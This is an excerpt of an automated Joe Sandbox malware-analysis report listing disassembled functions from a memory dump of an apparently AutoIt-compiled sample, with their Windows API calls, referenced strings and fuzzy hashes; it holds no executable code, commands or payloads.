Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00658049
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0065805C
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0065806F

__mtinitlocks.LIBCMT ref: 00657B4C

Part of subcall function 00657E23: InitializeCriticalSectionAndSpinCount.KERNEL32(006EAC68,00000FA0,?,?,00657B51,00655E77,006E6C70,00000014), ref: 00657E41

__mtterm.LIBCMT ref: 00657B55

Part of subcall function 00657BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00657B5A,00655E77,006E6C70,00000014), ref: 00657D3F
Part of subcall function 00657BBD: _free.LIBCMT ref: 00657D46
Part of subcall function 00657BBD: DeleteCriticalSection.KERNEL32(006EAC68,?,?,00657B5A,00655E77,006E6C70,00000014), ref: 00657D68

__calloc_crt.LIBCMT ref: 00657B7A
GetCurrentThreadId.KERNEL32 ref: 00657BA3

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 00f0e869dc00cfe2981a7257951eebcd143dcf6f14e23a82a31bb2c081335007
Instruction ID: dcbef778bd48a8d62045065fec272b66f2aaaba7c5908679b9731e2d4538af7a
Opcode Fuzzy Hash: 00f0e869dc00cfe2981a7257951eebcd143dcf6f14e23a82a31bb2c081335007
Instruction Fuzzy Hash: EFF0963210D3621AE7A47B74FC4768B26879F01733F21079DFC64D91D5FF2598494169

Function 006327EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0063281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00632825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00632830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0063283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00632843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0063284B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9f8aa2a17498d616568efe84926fbbb8d4ad65fc03c366408f3772391f7f4834
Instruction ID: ed6d7bdd4503552250c7a3c1519ab4255e4643298fa70f3a3ecf296252f2ea54
Opcode Fuzzy Hash: 9f8aa2a17498d616568efe84926fbbb8d4ad65fc03c366408f3772391f7f4834
Instruction Fuzzy Hash: 74016CB0901B5A7DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5

Function 00679AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: e6ba1fe98c9604f93542c5dcbf693605a693c97c2411a3e888fafd0deee3d420
Instruction ID: 917b71b3efc93de6c0f468c484fd9f0b8c47017735457eba88b2c494a3703ff3
Opcode Fuzzy Hash: e6ba1fe98c9604f93542c5dcbf693605a693c97c2411a3e888fafd0deee3d420
Instruction Fuzzy Hash: D801F476102212ABD7185B64EC49DEB77BBFF88301B045239F607962A4EB749940CB60

Function 00677BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00677C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00677C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00677C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00677C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00677C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00677C4C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: be096f7adecdf097f5d9fdfc9e844b04221a227eff7fd3b38654445c498d3d25
Instruction ID: 694fa15ffa93c4eed7a17762d2a5ad7815a4d1558c799ff563fd61d95b915e72
Opcode Fuzzy Hash: be096f7adecdf097f5d9fdfc9e844b04221a227eff7fd3b38654445c498d3d25
Instruction Fuzzy Hash: 79F09AB2241158BBE7211B529C0EEEF3BBDEFCAB11F000218FA01E5091F7A01A81C6B5

Function 00679A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00679A33
EnterCriticalSection.KERNEL32(?,?,?,?,006A5DEE,?,?,?,?,?,0063ED63), ref: 00679A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,006A5DEE,?,?,?,?,?,0063ED63), ref: 00679A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,006A5DEE,?,?,?,?,?,0063ED63), ref: 00679A5E

Part of subcall function 006793D1: CloseHandle.KERNEL32(?,?,00679A6B,?,?,?,006A5DEE,?,?,?,?,?,0063ED63), ref: 006793DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00679A71
LeaveCriticalSection.KERNEL32(?,?,?,?,006A5DEE,?,?,?,?,?,0063ED63), ref: 00679A78

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 004fb57cd06738eec81d8ce489964462c38104280af58e1ae1a68af880cc138f
Instruction ID: 29f6e99953c32e88cc3da5469aa5255b715cb41e5cf2d80459333f7f0ab3a27f
Opcode Fuzzy Hash: 004fb57cd06738eec81d8ce489964462c38104280af58e1ae1a68af880cc138f
Instruction Fuzzy Hash: AFF0E2B6142201ABD3111BA4EC8DDEF377BFF84301B141225F303991A8EB759A40DB60

Function 00631CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0064F4EA: std::exception::exception.LIBCMT ref: 0064F51E
Part of subcall function 0064F4EA: __CxxThrowException@8.LIBCMT ref: 0064F533

__swprintf.LIBCMT ref: 00631EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00631D49

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 5973157677ee6b5db72cd30e12aa79cdf1d04fc6d0471e9f59f61cb31103baac
Instruction ID: 9b2188074f1688aac61d030dcf2c4935714e0ca2018fc188d73affeeb84688a2
Opcode Fuzzy Hash: 5973157677ee6b5db72cd30e12aa79cdf1d04fc6d0471e9f59f61cb31103baac
Instruction Fuzzy Hash: 8F915C71508201AFC754EF24C895CAEB7F6EF86710F00491DF8869B2A1DB31ED09CB96

Function 0068AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0068B006
CharUpperBuffW.USER32(?,?), ref: 0068B115
VariantClear.OLEAUT32(?), ref: 0068B298

Part of subcall function 00679DC5: VariantInit.OLEAUT32(00000000), ref: 00679E05
Part of subcall function 00679DC5: VariantCopy.OLEAUT32(?,?), ref: 00679E0E
Part of subcall function 00679DC5: VariantClear.OLEAUT32(?), ref: 00679E1A

Strings

AUTOIT.ERROR, xrefs: 0068B11B
Incorrect Parameter format, xrefs: 0068B03E, 0068B20B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 8c4ccbd779c03cb55c8a120dc500c71729b063bb078929c07c8f3c1d4e1e0465
Instruction ID: 619734a668ba178f110d83b064c83a19ac922547de05a2bb8963422d713515f3
Opcode Fuzzy Hash: 8c4ccbd779c03cb55c8a120dc500c71729b063bb078929c07c8f3c1d4e1e0465
Instruction Fuzzy Hash: 2B919E706043019FCB50EF24C4959ABBBF6EF89710F04496DF89A9B362DB31E945CB92

Function 00675347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0064C6F4: _wcscpy.LIBCMT ref: 0064C717

_memset.LIBCMT ref: 00675438
GetMenuItemInfoW.USER32(?), ref: 00675467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00675513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0067553D

Strings

0, xrefs: 00675430

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: b2ca0dc1d07fdb5549c3faaa40d473cbed500cd38f71c7c4518bd94caaea0cc2
Instruction ID: f4d65417e6e3939fda2cce476932958544be37c40d44aa6894a9aed44f9270b5
Opcode Fuzzy Hash: b2ca0dc1d07fdb5549c3faaa40d473cbed500cd38f71c7c4518bd94caaea0cc2
Instruction Fuzzy Hash: 6051F2715047019BE7549B28C8416BBB7EBAB45360F14866DF89ED72A0EBE0CD448B92

Function 00670213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0067027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006702B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006702C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00670344

Strings

DllGetClassObject, xrefs: 006702B7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 487951d6f0377a087d7129ed280c5b5eab3084adc34806e80f51644b93b7c29e
Instruction ID: 8ff40515c2a7bf7b7da3b0ae6b1bf33683d77502e1d7e23cdd55682c364ee2a1
Opcode Fuzzy Hash: 487951d6f0377a087d7129ed280c5b5eab3084adc34806e80f51644b93b7c29e
Instruction Fuzzy Hash: 63415DB1600205EFEB05CF64C885BAA7BBAEF44324B14C0ADE90D9F246D7B5D945CBB0

Function 00675007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00675075
GetMenuItemInfoW.USER32 ref: 00675091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 006750D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006F1708,00000000), ref: 00675120

Strings

0, xrefs: 0067506D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0cde115cd6799c2ed265f2483c7612d30222efdc62a04202bfcd6d39242c1a49
Instruction ID: a4dd99ba00a0863d633c791c281f3a21df5074a734a47d4d262d55d70eaf0dc7
Opcode Fuzzy Hash: 0cde115cd6799c2ed265f2483c7612d30222efdc62a04202bfcd6d39242c1a49
Instruction Fuzzy Hash: 1E4103702047019FD720DF28DC85B6AB7E6AF85325F14869EF86A97391D7B0E800CB66

Function 00690567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00690587

Strings

winapi, xrefs: 006905F8
cdecl, xrefs: 006905DE
none, xrefs: 00690662
stdcall, xrefs: 00690609

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 458d8a88625ea80681bf9bc9ee3f65ef9131022fec17e231e917eb26e5703555
Instruction ID: 82d91ee6c0d7b1bc1a7ce4c721e7235e8156d885f07ae1abee19347878770d31
Opcode Fuzzy Hash: 458d8a88625ea80681bf9bc9ee3f65ef9131022fec17e231e917eb26e5703555
Instruction Fuzzy Hash: 47318170500216AFDF00EF68CD919EEB7BAFF55314B10862DE826A76D1DB71A916CB80

Function 0066B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0066B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0066B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0066B8D1

Strings

ComboBox, xrefs: 0066B815
ListBox, xrefs: 0066B84D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: a4b647d142cfe26d4031930f9ceb665899d533b8378e87d46260989e105b513b
Instruction ID: fed7ac72ee848d604b2a9c4b2e8b3052bf1da779bca6e84d4b68d8625af7af09
Opcode Fuzzy Hash: a4b647d142cfe26d4031930f9ceb665899d533b8378e87d46260989e105b513b
Instruction Fuzzy Hash: F821D0B1A00208BFDB44AB68C8869FE777EDF45350F10522DF422A71E1DB644D469B64

Function 006843E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00684401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00684427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00684457
InternetCloseHandle.WININET(00000000), ref: 0068449E

Part of subcall function 00685052: GetLastError.KERNEL32(?,?,006843CC,00000000,00000000,00000001), ref: 00685067

Strings

, xrefs: 00684450

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 984fff5e55249c73738ec529d431dac715f7b0e636a864ed23e3eb1110d282b4
Instruction ID: d179f4f9dba7e085bbb7b2a5268a08e3d9b9cb370855d69469fc216e1c37893e
Opcode Fuzzy Hash: 984fff5e55249c73738ec529d431dac715f7b0e636a864ed23e3eb1110d282b4
Instruction Fuzzy Hash: 6921C2B1500209BFE711AF54CC84FFFBAEEEB48748F10822AF105A6240EE648D0597B1

Function 006990E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0064D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0064D1BA
Part of subcall function 0064D17C: GetStockObject.GDI32(00000011), ref: 0064D1CE
Part of subcall function 0064D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0064D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0069915C
LoadLibraryW.KERNEL32(?), ref: 00699163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00699178
DestroyWindow.USER32(?), ref: 00699180

Strings

SysAnimate32, xrefs: 00699137

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 0b6fada0b257c6f296b9721c9c6fe4e76fc8b7aa9ac0082a1a3cd37eecb88d80
Instruction ID: 8ebfb18cd3a8ac718111b258b5d788362fe69746575072e9e541e4c0483e6b1f
Opcode Fuzzy Hash: 0b6fada0b257c6f296b9721c9c6fe4e76fc8b7aa9ac0082a1a3cd37eecb88d80
Instruction Fuzzy Hash: E3218E71600206BBEF204E69DC85EFA37AEFB9A364F10061DF91496690D732DC52A770

Function 00679568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00679588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006795B9
GetStdHandle.KERNEL32(0000000C), ref: 006795CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00679605

Strings

nul, xrefs: 00679600

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 5a1ce348587f9d4a39ecc262eef4658f31179d510e215b650ac0eef6d0fab8cf
Instruction ID: 9053a401eeb4d74fd4cdaf39ed95ab9e25fea6026414247bf8b8e9e9c62428c4
Opcode Fuzzy Hash: 5a1ce348587f9d4a39ecc262eef4658f31179d510e215b650ac0eef6d0fab8cf
Instruction Fuzzy Hash: F62162B0500216ABEB219F25DC45ADA7BF6AF45724F208A19F9A9D73D0D770D941CB30

Function 00679634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00679653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00679683
GetStdHandle.KERNEL32(000000F6), ref: 00679694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006796CE

Strings

nul, xrefs: 006796C9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 389f309372202b3d17daff90edc2d6b5a418e19184e5846ceff9493926969a6c
Instruction ID: 07ae4aabbb3b6cf4600cc9095969181121df27a3b1d7c636c9c9b9c9650e4ee9
Opcode Fuzzy Hash: 389f309372202b3d17daff90edc2d6b5a418e19184e5846ceff9493926969a6c
Instruction Fuzzy Hash: A221B0716002069BEB209F698C05EDA77EAAF44734F208B18F9A5E73D0E770D941CB30

Function 0067DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0067DB0A
